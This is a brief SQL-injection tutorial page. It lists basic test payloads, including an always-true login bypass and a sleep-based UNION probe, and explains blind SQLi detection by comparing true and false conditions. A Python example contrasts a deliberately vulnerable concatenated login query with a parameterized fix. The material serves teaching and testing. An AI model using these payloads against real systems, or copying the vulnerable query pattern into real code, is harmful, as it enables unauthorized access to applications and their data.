
Basic SQLi Payloads

Test for presence of SQLi

'
' or 1=1-- -
a' or 1=1-- -
' or 1=2-- -
a' or 1=2-- -
1 or 1=2-- -
' UNION SELECT sleep(5)-- -

Blind SQLi

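With blind SQLi, the application displays no SQL output or error messages that would reveal the presence of SQLi.

Instead, SQLi is detected by observing how the web application behaves when the injected input is processed.

Compare the website's behavior when the input produces a valid SQL query with its behavior when the input produces an invalid one.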

Valid SQLi payload queries

Examples of SQLi payloads that should cause the SQL query to be a valid query (the injected condition 1=1 is always true).

' or 1=1

Login page SQLi example
Username: ' or 1=1 & Password: Anything

Invalid SQLi payload queries

Examples of SQLi payloads that should cause the SQL query to be an invalid query (the injected condition 1=2 is always false).

' or 1=2

Login page SQLi example
Username: ' or 1=2 & Password: Anything
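
The true/false comparison described above, shown against a string-concatenated login query and its parameterized fix. This is an added example, not part of the original page; the users table, the sample account and the function names are assumptions, and SQLite stands in for the application's database.

```python
import sqlite3

def make_db():
    # Constructed sample data: one account in an in-memory database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return db

def login_vulnerable(db, username, password):
    # Input is concatenated into the SQL text, so a quote in the input
    # changes the structure of the query itself.
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    try:
        return db.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False  # blind case: the error is swallowed, nothing is shown

def login_parameterized(db, username, password):
    # Placeholders keep the input as data; it is never parsed as SQL.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone() is not None

def compare(db, login):
    # The always-true / always-false pair from the page. If the two results
    # differ, the input is being interpreted as SQL.
    true_case = login(db, "' or 1=1-- -", "Anything")
    false_case = login(db, "' or 1=2-- -", "Anything")
    return true_case, false_case

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:   ", compare(db, login_vulnerable))
    print("parameterized:", compare(db, login_parameterized))
```

The same pair of inputs works as a regression test: a login function passes when both return the same result.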